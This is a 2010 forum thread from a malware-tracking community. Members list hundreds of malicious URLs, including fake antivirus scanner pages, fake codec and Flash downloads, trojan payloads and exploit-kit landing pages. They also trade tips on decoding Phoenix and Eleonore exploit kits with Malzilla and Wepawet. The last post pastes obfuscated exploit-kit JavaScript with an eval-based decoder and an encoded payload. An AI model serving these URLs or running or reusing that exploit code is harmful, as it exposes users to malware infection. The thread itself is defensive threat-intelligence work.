Malware Domain List
Malware Related => Malicious Domains => Topic started by: lelenina on June 13, 2010, 05:09:16 pm
-
http://memory-scanner.com
Fake Scanner Page
http://scanner-models.com
Fake Scanner Page
http://globalwarmingtray.info/nc12/index.php?ID=1
Redirects to fake scanner page
-
http://justatube.com
Fake Porn Site
http://real-tube.org
Fake Porn Site
-
http://baronessan.se/.9k7ea/?getexe=se1ws.exe
Koobface
-
http://ohh.please-unblock-me.com/?oazagezitv
-
http://scanner-glass.com
Fake scanner page
-
http://scanner-manufacturer.com
Fake Scanner Page
http://scanner-glass.com
Fake Scanner Page
http://code-scanner.com
Fake Scanner Page
-
http://laser-copier.com
Fake Scanner Page
-
http://rmets.biz/cgi-bin/cn.aspx?ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002T0RvaU5EZzFPVFl3T0RVaU8zTTZNVEk2SW1Ga2RtVnlkR2x6WlY5cFpDSTdjem8xT2lJek5qWTJPU0k3Y3pvME9pSnJjSEJwSWp0ek9qTTZJams1T1NJN2ZYTTZNem9pYldRMUlqdHpPak15T2lJek9EZ3daV0pqTldJME9USTNOVE5qTlRZMk56azJPREkzTURJeE9URTJOeUk3ZlE9PQ%3D%3D/s00a106201317r0409Xf1646355Ybd4d7a0fZ0100f080
NeoSploit
http:///fairscansecurity.com
Fake Scanner Page
http://cheapscansecurity.com/
Fake Scanner Page
http://burnscansecurity.com/
Fake Scanner Page
-
http://best-scanner-2010.com/
Fake Scanner Page
http://mega-scan-pc-new14.net/?code=1500
Fake Scanner Page
http://mugyra.org/sutra/in.cgi?15=&ID=1
Redirects to Fake Vimes
-
http://super-tubes-mego.com/xplay.php?id=45230
http://member-tube.com/xplay.php?id=40081
http://clear-web-tube.com/xplay.php?id=40081
http://modern-tube.net/xplay.php?id=45230
http://Last-sex-tube.com
http://best-tube-world.com/xplay.php?id=40081
http://sunny-tube-house.com/xplay.php?id=45043
http://super-cool-tube.net/xplay.php?id=45284
http://suoer-mego-tubes.com/xplay.php?id=40081
http://clear-great-tube.com/xplay.php?id=45284
All of them are fake porn sites.
-
http://www3.epic10.co.cc/?p=p52dcWltbV%2FRlsijZFahqJ51nF6ZZGSdkZzHlGk%3D
Redirects to fake scanner page
http://www2.sunclear.co.cc/?p=p52dcWltbV%2FCj8bYboN6dYhe0KCfYWCcU9LXoKitaVzHysd2lJN%2Fel6orKWeZZWdZWRkmGublWWIo6THodjXoFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1mmaQYWKaW5Scm19oY2qL08ifb1qtp3VlanCZXZeZYmJjWqarlmqTYmeeXZaXlGNtWJnInriMWKuimHVsams%3D
Fake scanner page
-
http://ultimatewide.in/4/getexe.php?spl=mdac
Insain trojan
http://gromalines.pl.ua/grad/222/ya.php
Redirects to fake scanner page
http://highsecurityscan.com
Fake scanner page
-
http://hotsecurityscan.com
fake scanner page
-
http://www4.omgomg9.co.cc/?p=p52dcWltbV%2FRlsijZFahqJ51nV7DZJadk5zHmJI%3D
Redirects to fake scanner page
http://www1.truefind44p.co.cc/?p=p52dcWltbV%2FCj8bYboN6dYhe0KCfYWCcU9LXoKitaVzHysd2lJN%2Fel6orKWeZpXHZZZkmmubmY6Io6THodjXoFeob1zZytell3FfmqGgnXaHo83LqG1TnaJ1mmaQYWKaW5Scm19oY2qL08ifb1qtp3VlanCZX52faWVjWqarlmqTYmeeX5ydm2ZtWJnInriMWKuimHVsams%3D
Fake scanner page
http://opensecurityscan.com/
Fake scanner page
-
http://ad.googleanaliticks.com/info/u2.html/s002106204317r0409Rabff69a9Xbba2610cY3b3f5a86Z0100f060
NeoSploit
-
http://dasafa.info/page/new.php/s002106201317r0409Ra38dbe4fX865af0a8Yca6a16c0Z0100f080
NeoSploit
-
http://new-tube-fest.com/xplays.php?id=45031
fake movie site
http://designnewmedia.com/video-plugin.45031.exe
fake codec
-
http://billivilli.co.cc/bilvil/nc111/nc.php?uid=2114&pid=3
Redirects to fake scanner page
http://sendyourtraffic41.org/elka/404.php
Redirects to fake scanner page
http://best-online2.com/tds_privatcoin_go1.php?ID=100000
Redirects to fake scanner page
-
http://rheal.biz/cgi-bin/cn.aspx?ID=100000
NeoSploit
-
http://huyqvpeotwyn.com/tre/sena.py
NeoSploit
-
http://digitalmediasonic.com/video-plugin.45031.exe
Fake codec
-
http://superupdates.com/video-plugin.45031.exe
Fake codec
-
http://dotroot.tk/1.php?ID=1
Redirects to fake scanner page
-
http://b23.ru/e1ij
Facebook phisher
-
http://4info-tools.com/video-plugin.45031.exe
Trojan
-
http://freemovieswww.info/player_update/divx_fix_patch.exe
Trojan TDSS
-
http://parkinssu.info/hb/
Fake Scanner Page
-
http://mediapromedia.com/video-plugin.45031.exe
Trojan
-
http://caazzaport.co.cc/caaza/go.php?sid=1
Redirects to fake scanner page
-
http://yastatic.co.cc/333/ya.php
Redirects to fake scanner page
-
http://rmetsih.biz/cgi-bin/cn.aspx?ID=1
NeoSploit
-
http://dvdmusicinfo.com/New-Video-Addon.48577.exe
Trojan
-
http://everytds.tk/in.cgi?3=&ID=1
Redirects to fake porn site
http://vogel-tube.com/xfreeporn.php?id=45309
Fake porn site
http://digitalmediaset.com/video-plugin.45309.exe
Trojan
http://digitalmediaset.com/video-plugin.45031.exe
Trojan
-
http://onlyscan.tk/goo/oCi8j.pdf
Pdf exploit I believe it installs Defense Center
-
http://onlyscan.tk/goo/zCue.class
Exploit?
-
http://digitalpackback.com/New-Video-Addon.48665.exe
Trojan
-
http://electronicbankdata.com/video-plugin.45309.exe
Trojan
-
http://www3.doligz39td.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3JXsiYlWmdYmiaxA%3D%3D
Redirects to fake scanner page
http://www2.yourprotection86.co.cc/?p=p52dcWplanKHjsbIo22AgXOOipnVbWGWY4nT1m6uqG2Lw8ydb5aYen5arK3NaseXlmRfbJholmLFVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooWObXmGYYZGVm2llY2eZh9WemHFfqKtxaWuYZpaYY2NeZFis11%2BfYWKdZpWWlWRoYlzIxKCOhVqwnZxxcWyV
Fake scanner page
-
http://truestarmedia.com/video-plugin.45309.exe
Trojan
-
http://everytds.tk/in.cgi?4=&ID=1
redirects to exploit kit
http://dfrscanner.tk/non/index.php
Exploit kit
http://dfrscanner.tk/non/um1zi.pdf
Pdf exploit
-
http://activemedianews.com/video-plugin.45312.exe
Trojan
http://mediaservicesdata.com/New-Video-Addon.48577.exe
Trojan
-
http://globstere.info/gh/
Fake scanner page
-
http://nike1ot2n.com/ab/tmp/pdfopen.pdf
Pdf exploit
-
http://nike1ot2n.com/ab/tmp/m.vbs
the second part of the exploit
http://nike1ot2n.com/ab/l.php?i=14
Trojan.Downloader
-
http://allxscan.tk/ddt/fVJV.pdf
Pdf exploit
-
http://mtravel3biz.com/in.cgi?19=¶meter=porn&mudo=dumd&ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002TmpvaU9EQXlOakUzSWp0ek9qRXlPaUpoWkhabGNuUnBjMlZmYVdRaU8zTTZOam9pTVRFNE16TTBJanR6T2pRNkltdHdjR2tpTzNNNk16b2lPVGs1SWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SWpCbU9UZzBaRE13TURrMVlqRm1aRFE0WWpVMFlXSXlNR0kyT1RobFlqUTNJanQ5
Redirects to exploit kit and fake scanner page?
-
http://www.domainnamereg1.in/retn/qb0pfsg/lgut722.php
Java exploit
-
http://92.63.107.10/223/tmp/pdfopen.pdf
Pdf exploit
http://92.63.107.10/223/tmp/m.vbs
Second part of the exploit
http://92.63.107.10/223/l.php?i=14
Trojan.Downloader
-
http://firstport.in/x/?src=kostes&id=best&o=o&ID=1&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qTTZlM002TWpvaWFXUWlPM002TmpvaU5qRXhPRGt6SWp0ek9qRXlPaUpoWkhabGNuUnBjMlZmYVdRaU8zTTZOam9pTVRJeE1UUTFJanR6T2pRNkltdHdjR2tpTzNNNk16b2lPVGs1SWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SW1Zek9UaGlOV0ppWm1abVpUaGpaRGd6WXpRNVpUTmlOalZoWkRObFpUTXlJanQ5
Directs to exploit kit?
-
http://datadigitalonline.com/video-plugin.45031.exe
Trojan
-
http://flashdns.in/x/?src=kostes&id=best&o=o&ID=100000
Exploit kit
-
http://fitrst.ignorelist.com/3/?c=11
Fake scanner page
-
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)
-
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)
fake scanner page is a side effect only.
It is a Eleonore exploit kit. Fake scanner url is probably called only if exploits are unsuccessful.
Look at function complete(). I have seen such a combinatiion before.
http://wepawet.cs.ucsb.edu/view.php?hash=8a89f74589ce966cf71a08a4d86e567b&t=1279656448&type=js
-
http://ntscanner.in/new/index.php?ID=1
Exploit kit
-
http://www.domainnamereg2.in/retn/qb0pfsg/mq780ag.php?s=2fe5d89d78da92f1d0f323f8d9b20738&ID=1
Redirects to fake scanner page (same redirection as pivfeels.com)
fake scanner page is a side effect only.
It is a Eleonore exploit kit. Fake scanner url is probably called only if exploits are unsuccessful.
Look at function complete(). I have seen such a combinatiion before.
http://wepawet.cs.ucsb.edu/view.php?hash=8a89f74589ce966cf71a08a4d86e567b&t=1279656448&type=js
Wepawet really comes in handy when analyzing exploits. I have that website bookmarked. Thank you for showing me that. :)
-
http://mtravel3biz.com/in.cgi?20¶meter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://stifast31.info/bv/
Fake scanner page
http://bereto8ns.com/zbb/index.php
Exploit kit
http://superflashplayer.com/video-plugin.45031.exe
Trojan
http://theflashclub.com/New-Video-Addon.48577.exe
Trojan
-
http://super-fresh-tube.com/xfreeporn.php?id=45309
Fake porn site
http://mediafirstsystems.com/video-plugin.45309.exe
Trojan
-
http://tdsinfo.tk/in.cgi?3=&ID=10000
exploit kit
-
http://netmediaforum.com/video-plugin.45309.exe
Trojan
-
http://lcitsih.biz/index.php?ID=1
Exploit kit
-
http://nimtsih.biz/l.php?i=2
Trojan.Dropper
-
http://adobeflash-ver16.co.tv/zxce/install_adobe_flash.exe
Trojan
-
http://zsitsih.biz/index.php?ID=1
Exploit kit
http://nimtsih.biz/l.php?i=2
Trojan.Dropper
-
http://dandbcorporation.com/l.php?i=14
Fake AV
-
http://awrinc.net/style/images/go.php?sid=1
Redirects to fake scanner page
-
http://bellday.ru:8080/index.php?pid=10
Exploit kit
-
http://illinated.co.in/index.php?ID=1
Exploit kit
http://illinated.co.in/tmp/libtiff.pdf
Pdf exploit
http://illinated.co.in/l.php?i=14
Trojan.Downloader
-
http://scripttoscan.co.cc/installer.0042.exe
Fake AV
-
http://www3.trust-av41.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXsiYk2mbY5udkQ%3D%3D
Redirects to fake scanner page
-
http://averagedaddy.com/?showc=vindictus
Redirects to fake scanner page? According to Norton Safeweb.
-
http://213.155.29.144/news/l.php?deserialize=1b&i=
Fake AV
-
http://temptrouble.in/4/index.php
Exploit kit
http://temptrouble.in/4/getexe.php?spl=mdac
Trojan
-
http://allvexxx.tk/1/index.php
Exploit kit
-
http://avadrom.co.in/index.php?ID=1
Exploit kit
-
http://red-xxx-tube.net/cgi-bin/setuppatch.pl?adv=1481
Trojan
http://capdataservice.com/New-Video-Addon.48577.exe
Trojan
http://hotxtubeonline.com/mov524/movie.exe
Trojan
-
http://11.wenmo.in/x/index.php?s=036cb76056fdbc21df981dec95f43cb6
Exploit kit
http://11.wenmo.in/x/l.php
Trojan
-
http://allmediavision.com/New-Video-Addon.48440.exe
Trojan
-
http://bestdatawork.com/video-plugin.45035.exe
Trojan
http://filesserveronline.com/New-Video-Addon.48577.exe
Trojan
-
http://psoriasisinstruction.com/wp-content/43/sexy-bodies.html
Java on screen popup leads to fake codec
-
http://video39-tube.servepics.com/video.php?l=6:09&id=1&n=teen&a=nEcroS&path=./tmb/teen/03.jpg&rat=./img/rating5.jpg&v=20750
Leads to fake AV disguised as a codec
-
http://tube-hosting270.sytes.net/getfile95666/flash_player_installer.exe
Fake AV
-
http://videos90-host.redirectme.net/download-id72929/flash_player_installer.exe
Trojan
-
http://videos90-flash.3utilities.com/?n=teen&id=1
Leads to trojan
-
http://tube62-host.sytes.net/?n=teen&id=1
Leads to trojan
-
http://flash36-videos.redirectme.net/?n=teen&id=1
Directs to trojan
-
http://video96-pics.servehttp.com/?n=teen&id=1
Directs to trojan
-
http://02.acani.in/x/index.php
Exploit kit
http://02.acani.in/x/l.php
Trojan
-
http://websmeter.com/new/index.php
Exploit kit
http://websmeter.com/new/load.php?f=1&e=4
Trojan Iflar
-
http://flash33-hosting.servepics.com/?n=teen&id=1
Directs to trojan
-
http://hosting17-video.3utilities.com/?n=teen&id=1
Directs to trojan
-
http://modern-tube.net/xplays.php?id=40030
Directs to trojan
-
http://hetupoxiy.cn/chat/bd3225fe436c29ac8474e83d3cd38c08.php?showuser=25329981&showforum=s1
Pdf exploit
-
http://actdataonline.com/New-Video-Addon.48577.exe
Trojan
-
http://193.105.174.53/DE/index.php
Exploit kit
http://193.105.174.53/DE/l.php?deserialize=e9&i=
Trojan
-
http://ca200dajskjdhd.com/kde/index.php
Exploit kit
http://ca200dajskjdhd.com/kde/l.php
Trojan
-
http://178.239.48.101/index.php?q=9VGU1G21ML942SE396872SD4HB9H5PB80DX99TMS00203MN3UO4XD4U4Z7PzcpQRhbVTE8VmtbNzlSXmlRU044IU00NlAlUCw%252BDglqaQsNenxrCB4DAQcxf09kMwAkJwJlBWsHNSFnBnRRB3R4XFIAYSALAQNZAAVrJgcrcwE0BGJ6CQBzaQ4JbDk2Q0Q%253D
Fake scanner page
http://acer.is-a-geek.net/3/?c=917
Fake scanner page
http://digitalartfact.com/New-Video-Addon.48577.exe
Trojan
-
http://bondbm3x.com/in.cgi?20¶meter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://mohotwrxst.info/hn
Fake scanner page
-
http://fchfdghfg.tk/new/index.php?ID=1
Exploit kit
http://fchfdghfg.tk/new/41fdcb12a4bc143f98999fcda8927ecc.pdf
Pdf exploit
http://fchfdghfg.tk/new/load.php?f=1&e=2
Trojan
-
http://sixpornvideos.in/pornhub/animal-porn-movie.exe
Trojan
-
http://xatechbot.com
Leads to fake codec
http://0scene.info
Leads to trojans
-
http://www.hookranger.info/tx/
Fake scanner page
-
http://ssdssds.co.cc/x/index.php?s=8b02a28ea6391cdd77172f450ecf4855&ID=1
NeoSploit
-
http://ssdssds.co.cc/x/l.php
Trojan
-
http://fastsofon.com/any3/5-direct.ex
Fake AV?
-
http://www3.real-security83.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3LXpqYnGlvZZeVkQ%3D%3D
Redirects to fake scanner page
-
http://www.searchfertile.com/a/ad
Fake AV
-
http://max3wrxstia.com/in.cgi?20¶meter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://www.lancergooe.info/yu/
Fake scanner page
http://nolewe0ret.com/ab/index.php
Exploit kit
http://nolewe0ret.com/ab/l.php
Trojan
-
http://www.offline.pt/template/go.php?sid=1
Redirects to fake scanner page
-
http://datzsdt.co.cc/x/index.php
Exploit kit
http://datzsdt.co.cc/x/l.php
Trojan
-
http://ppcube.com/in.cgi?8
Redirects to fake porn site and fake scanner page
-
http://engsquad.com/?affid=387&subid=landing
Fake scanner page
-
http://lilumy3wxt.com/in.cgi?20¶meter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://n2lewe1ret.com/ab/index.php
Exploit kit
http://n2lewe1ret.com/ab/l.php
Fake AV
-
http://matthall.com.au/properties/index.php
Eleonore Exploit pack version 1.3.2
http://matthall.com.au/properties/statss.php?exefile=1
Control panel of Eleonore Exploit pack version 1.3.2
http://matthall.com.au/properties/load.php
Trojan
-
http://mainstep.in/4/index.php
Exploit kit
http://mainstep.in/4/l.php
Trojan
-
http://pradolast.com/in.cgi?20¶meter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://mobielast.com/ab/index.php
Exploit kit
http://mobielast.com/ab/l.php
Fake AV
-
http://camarulon.com/in.cgi?20¶meter=bank44b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://laizamoko.info/cvd/
Fake scanner page
http://nocertesl1.com/ab/index.php
Exploit kit
http://nocertesl1.com/ab/l.php
Fake AV downloader
-
http://softplugin.in/7/?name=best&vid=hidden&cat=kostes&offset=4&last=image&ID=1
Exploit kit?
-
http://78.26.179.197/index.php
Exploit kit
http://78.26.179.197/l.php
Fake AV Downloader
-
http://ceberd.com/wev/foolwrite.php
Redirects to pdf exploit
-
http://www.bestellkanal.tv/images/redir.php
Redirects to fake scanner page
-
http://air3liness.com/in.cgi?20¶meter=jonn4b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://lokonetorzz.com/mms/
Fake scanner page
http://nevoex65eo.com/ab/index.php
Exploit kit
http://nevoex65eo.com/ab/l.php
Fake AV Downloader
-
http://78.26.179.203/index.php
Exploit kit
http://78.26.179.203/l.php
Fake AV
-
http://sugilofyjypomito.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
TDSS
-
http://universesearches.com/12/
Redirects to fake porn site
-
http://tokyocrab.in/go.php?sid=6
Redirects to fake porn site with trojan TDSS
-
http://budooqoejofihy.cjb.com/maindirectory/get.php?name=Sex_Toys_Movie_129.mpeg
Trojan
-
http://10-4warning.com
Yahoo! phishing?
-
http://first-malware-checker.co.cc/secure1/?id=213
Fake scanner page
-
http://helesouurusa.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
Trojan TDSS
-
http://abodeflash-vol33.co.tv/om/ms.php
Trojan
http://qusocereloteryg.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
Fake AV
-
http://host68-video.sytes.net/?n=teen&id=1
Fake porn site leads to trojan
-
http://scantrafficstruct.co.cc/installer.0042.exe
Fake AV
-
http://mediaforearth.com/video-plugin.45031.exe
Trojan
-
http://iakoberoonn.info/mmb/
Fake scanner page
http://nevobbqq2o.com/ab/index.php
Exploit kit
http://nevobbqq2o.com/ab/l.php
Fake AV
http://nevobbqq2o.com/ab/exe.exe
Fake AV
-
http://best-antimalware-scanner.co.cc/secure1/?id=213
Fake scanner page
-
http://interammo.com/shop/images/redir.php
Redirects to fake scanner page
-
http://xvideostube.cjb.net/
Fake porn site directs to trojan
-
http://free-scanner-online.co.cc/secure1/?id=213
Fake scanner page
http://szyseyz.co.cc/x/1.zip
Trojan?
-
http://grillout3s.com/in.cgi?20¶meter=jonn4b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
-
http://onlineservice1.co.cc
Fake scanner page
http://onlineservice1.co.cc/?do=getexe&id=1
Trojan
-
http://rorty-tube.com/xplays.php?id=45031
Directs to trojan
-
http://elenatyr3s.com/in.cgi?20¶meter=jonn4b&ur=1&HTTP_REFERER=nnned1
Redirects to fake scanner page
http://kiamagentoss.net/evo/
Fake scanner page
http://whykersspt.com/aa/index.php
http://whykersspt.com/aa/tmp/libtiff.pdf
http://whykersspt.com/aa/l.php?i=8
http://whykersspt.com/aa/exe.exe
Exploit kit fake AV downloader as payload
http://1eb6499c0d3856f5220e282fec1592.co.cc/preinst.php?id=02909
Fake AV
-
http://xxxvideo-xjxq.cz.cc/go/?afid=94&time=1283559846
Trojan downloader
-
http://merlion3oll.com/in.cgi?20¶meter=jonn4b&ur=1&HTTP_REFERER=nnn1
Redirects to fake scanner page
http://tucointopp.com/img/
Fake scanner page
http://jazzstibbtm.com/aa/index.php
Exploit kit
[code]
http://jazzstibbtm.com/aa/l.php
http://jazzstibbtm.com/aa/exe.exe
Fake AV Downloader[/code]
-
http://noplic.org/
Redirects to fake porn site with trojan
-
http://solo-hootersxxx.redirectme.net/downloadflow/flowplayer.10.467.exe
Trojan
-
http://slut-topxxx.sytes.net/?id=0
Fake porn site leads to trojan
-
http://log_account_activation.t35.com/verifyaccount.html
Facebook phishing
-
http://balls-boobsxxx.servehttp.com/flow-download/install_flow_player.10.284.exe
Trojan
http://keygen.fileave.com/drivers.exe
Trojan
-
http://pleasing-tube.com/xplays.php?id=45031
Directs to trojan
http://loadmediameans.com/video-plugin.45031.exe
Trojan
-
http://merlion3oll.com/in.cgi?20¶meter=jonn4b&ur=1&HTTP_REFERER=nnn1
Redirects to fake scanner page
http://uikou.in/scaner/?id=02909
Fake scanner page
http://zestrsooots.com/aa/index.php
Exploit kit
-
http://nojtul.co.cc/c/index.php
Phoenix Exploit Kit
http://nojtul.co.cc/c/statistics.php
Control panel of Phoenix Exploit Kit
http://nojtul.co.cc/c/l.php
http://nojtul.co.cc/c/exe.exe
Trojan
-
http://buyshieldec.com/dimesis.php?ID=19776
Redirects to fake scanner page
-
http://jewertlins.com/stars/index.php
Exploit kit
http://jewertlins.com/stars/l.php
Trojan
-
http://titolutis.cn/1/index.php
Phoenix Exploit kit
http://titolutis.cn/1/statistics.php
Control panel of Phoenix Exploit Kit
http://titolutis.cn/1/l.php
http://titolutis.cn/1/exe.exe
Swisyn trojan
-
http://huzytaj.co.cc/get/index.php
Exploit kit?
-
http://huzytaj.co.cc/get/index.php
Exploit kit?
Do you receive any content from this url ? I don't get anything.
Special referer ?
-
http://huzytaj.co.cc/get/?pg=171&action=italynew&e=post
same as
http://www.malwaredomainlist.com/mdl.php?search=jabylat.co.cc&colsearch=All&quantity=50
but
/get/?pg=171&action=italynew&e=post
works only with ip from italy
-
http://goupdates.is.com/
Redirects to exploit kit.
-
http://vobuzmgsy.ru/wint2/
Redirects to fake scanner page
-
http://eveninglottery.cz.cc/index.php?s=2&u=4cb83405e1f594cb83405e2342
Exploit kit?
-
http://eveninglottery.cz.cc/index.php?s=1&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/index.php?s=2&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/d.jar
http://eveninglottery.cz.cc/java.php?jar=1
http://eveninglottery.cz.cc/pdf3.php
http://eveninglottery.cz.cc/loadd.php
http://eveninglottery.cz.cc/load.php?sploit=JAVASMB
http://www.virustotal.com/file-scan/report.html?id=643c9528038b7f0202cc07c18536beca7004849aa2c9dbfc1dd2dcd9313937ba-1287242215
-
http://eveninglottery.cz.cc/index.php?s=1&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/index.php?s=2&u=4cb83405e1f594cb83405e2342
http://eveninglottery.cz.cc/d.jar
http://eveninglottery.cz.cc/java.php?jar=1
http://eveninglottery.cz.cc/pdf3.php
http://eveninglottery.cz.cc/loadd.php
http://eveninglottery.cz.cc/load.php?sploit=JAVASMB
http://www.virustotal.com/file-scan/report.html?id=643c9528038b7f0202cc07c18536beca7004849aa2c9dbfc1dd2dcd9313937ba-1287242215
Thanks. How did you find all of those URLS? Wepawet did not work for me.
-
I tried index.php?s=1&u=4cb83405e1f594cb83405e2342
1 instead of 2
and decoded the page with malzilla
http://wepawet.iseclab.org/view.php?hash=f4a5bbcd8cd803d4184f32535466751b&t=1287263312&type=js
-
http://pihrbu.net.in/scaner/?id=02915
Fake scanner page
http://pihrbu.net.in/get.php?id=02915
Fake AV
-
http://zgggrusd.ru/wint2
Redirects to fake scanner page
-
http://updatenews.cz.cc/firefox-updates/
Fake Firefox update
http://updatenews.cz.cc/firefox-updates/ff_secure_upd.exe
Fake AV
http://binertug.com/2ajimifr1.php?s=IBBGA
Exploit kit
-
http://bentrolmy.com/3d8h6j60fll.php?s=IBBGA
Exploit kit
-
http://djdbttb.co.cc/red.php
Iframe directs to exploit kit
http://broundfal.com/dm3rgu.php?s=IBBKB
Exploit kit
-
http://4frank.cz.cc/c/enasfmdtiwjwkujm1.php
Exploit kit
-
http://curtyacupt.com/mytds/go.php?s=32
Redirects to fake scanner page
-
http://myutilitom.com/eoiouo8aa781io/kwgmctgvjrfmcqy.php
Exploit kit
-
http://webvideocentral.net/xplays.php?id=45031
Directs to trojan
http://fileplatz.com/video-plugin.45031.exe
Trojan
http://ymedonesalykura.cjb.com/land/maindirectory/adobeflashplayerv10.0.32.20.exe
Trojan
http://190.162.24.18:11066/index.html?u=406&t=1
Fake scanner page
-
http://sungbyuk.com/51ba0qq5x.php?s=IBBGA
Exploit kit
-
http://bestrecie.com/bjzlmpc779rh.php?s=IBBKB
Exploit kit
http://bestrecie.com/yocraqywyoyqe.pdf
http://bestrecie.com/yudrevgpeukrini.pdf
http://bestrecie.com/fpdletxubniuewd.pdf
http://bestrecie.com/crknxwbocphwctf.pdf
Pdf exploits
-
http://vitaminki.co.cc/
If referrer is google, iframe directs to exploit kit.
http://yourqare.com/anawa8h8.php?s=IBBKB
Exploit kit
-
http://lampasit.com/dx.php?i=91e33396-775d-4b95-81ce-c5084c00a332&a=1091409010&f=0
Tdss
-
http://availableused.co.cc/red.php
Redirects to exploit kit
-
http://whitesquarecube.com/1/gqitgzjqhlfph.pdf
http://ujsoltfinl.com/xwgzjmgwyvht.pdf
Pdf exploits
These pdf files are encrypted. Can Malzilla be used to find the URLS of the payloads they download? If not, how can the URLS be found?
-
http://company777.com/xp.php?ID=19776
Redirects to fake scanner page
-
http://brindlamp.com/j2pc33.php?s=IBBKB
Phoenix exploit kit
http://brindlamp.com/fpxohzcnfwklkze.pdf
Pdf exploit
With the new Phoenix exploit kits, the path to the payload is completely random. It is not as simple as l.php or exe.exe anymore. How can I find the URL to the payload if Wepawet is being too slow?
Thanks.
-
http://brindlamp.com/j2pc33.php?s=IBBKB
Phoenix exploit kit
http://brindlamp.com/fpxohzcnfwklkze.pdf
Pdf exploit
With the new Phoenix exploit kits, the path to the payload is completely random. It is not as simple as l.php or exe.exe anymore. How can I find the URL to the payload if Wepawet is being too slow?
Thanks.
use Malzilla's decoder tab:
1. delete everything that is marked red.
2. cut the green block and paste it at the end of the script
<body id='izyqk' name='izyqk'><applet archive="xvjtjsbuynhvj.jar" code='bpac.a.class'><param name="a" value='RSS=,TT#M;BD^FZ=IVQZTSONI=R='/></applet></body><textarea>function btbnhm7(ctywcq){return ctywcq.replace(/`/ig,' ').replace(/~/ig,'"').replace(/»/ig,String.fromCharCode(0x5*2)).replace(/•/ig,String.fromCharCode(0x2E*2));}document.write('<p>1177</p>');var gwevh8=parseInt(izyqk.getElementsByTagName(String.fromCharCode(0x38*2))[parseInt(String.fromCharCode(0x18*2))].innerHTML);var ipcncr='';for (xtjscnj = gwevh8; xtjscnj > 0; xtjscnj--){for (iwazgry = gwevh8-xtjscnj; iwazgry <= emgves.length; iwazgry=iwazgry+gwevh8){ipcncr=ipcncr+emgves.charAt(iwazgry);}}var ethmxz=ipcncr+"}MDAC();";var isaqbpx=btbnhm7(ethmxz);eval(isaqbpx);</textarea><textarea id='jlhoi2'>String.fromCharCode(101,0x76,97,0x6c);</textarea><script>var emgves="db<Ptd10ov5u%00d8u%0008u%1c10u%4c5eu%a890u%00e8u%1c08u%2525u%ee20u%0500u%1616u%9008u%60c0u%d02du%3433u%6000u%75b5u%f617u%0%A633u%s%2647usu%C603ianmipl`)`Bt;v<tved.c{0mp(lM).;tnampcnttn`i`rr.bX(D`fhe}(j)rbXn`w`Di&nnd`;dwh`rufnuh`%n`per;=`g.s``teuf=i`egem.n.i6u`daepuwh~u`{a4it6}of)pnc`*`=6`)o`uOt;tu.VpT`ntcb;ttvtr`.i~uut.Jtvo~o``````tf`MG`0oortucNpUeylusr`t`;;)l``~1mzcyi8*ptes(0xVi`}n)si``se`+te+2lu`tgrkleo%n2k0;o0o`eyrn';hunpnj`2-Bh`n(`v8`d-3h`Ae`/>eivlu`tk)n(be}soe6)7=)11A=vy0v(w/rnn;`da)(te{ib}wcae)(nle)ti`ootiDunt)'B03ps)epre'='.';(viF((e)t;M`••hcoa=etmtsE0;com.:DD;omreCpmglpe'puCae}}Lit3v'd'nAm>cn'syx'g>i)mr;cte==(tl.)i14bevt{id)dMdu{742F28636D`000F0342ED085C94E7B6CE1B5E9C2038A48C54808B0BF4E8798FF67ECFC95F503260C03005C4FFB634558C6A603E177669383C316F02472D441D37581D78Ae00000A1011616364616A6F7465636E67070E00000002040v0240644E69ccwVn9=|,,Ws',tA9F'063252A70683;,st60h4F7768306373f,es12aA23232F2E292v)'eE2359594867606C'd6'A64A202A285B670Na82F902A45427B7460eOPPS`e)'t`esmoni`orr[ath'[lp()xe|1ve)Pkff'de;(U)H`hceiW|2Is,9muueexpi`y(5+]=00013133FF55C507F000C600F2D7C656241627F526061656969697364633341656B72456477690F756A69001A00050309010109010403000806000B0A4701020201L{hoo/dh:C0da20u%c1b8u%0015u%2f27u%2fa0u%150du%1c04u%208cu%2800u%a050u%9000u%f754u%0390u%0c00u%01b0u%3e1eu%0000u%f352u%4600u'u%E226uku%D200k7u%F29orcpoBom;(ahwa`hawVp`vxpeeea;aey(cpet`heg+san(fOMnr(CrnrnV)eOMc=i=Eg`uui&}th`~nnueni&ue0t.gi`i)le(0i`l`=sAo~oesgms)n=eg(rnfe)t=tu,s38;tu{ege=2==4|{n+sLh}onz(rlfehta}oia``cnsznvyzoiaf`f4+a0~~``>abb8uu`;nLe(UmpCnigara}}`osa;0uUkts84rOlis8ftzmig{hs+hcb0)hc=8cn-hte`cncue0.)}cxr3w)ttddimtld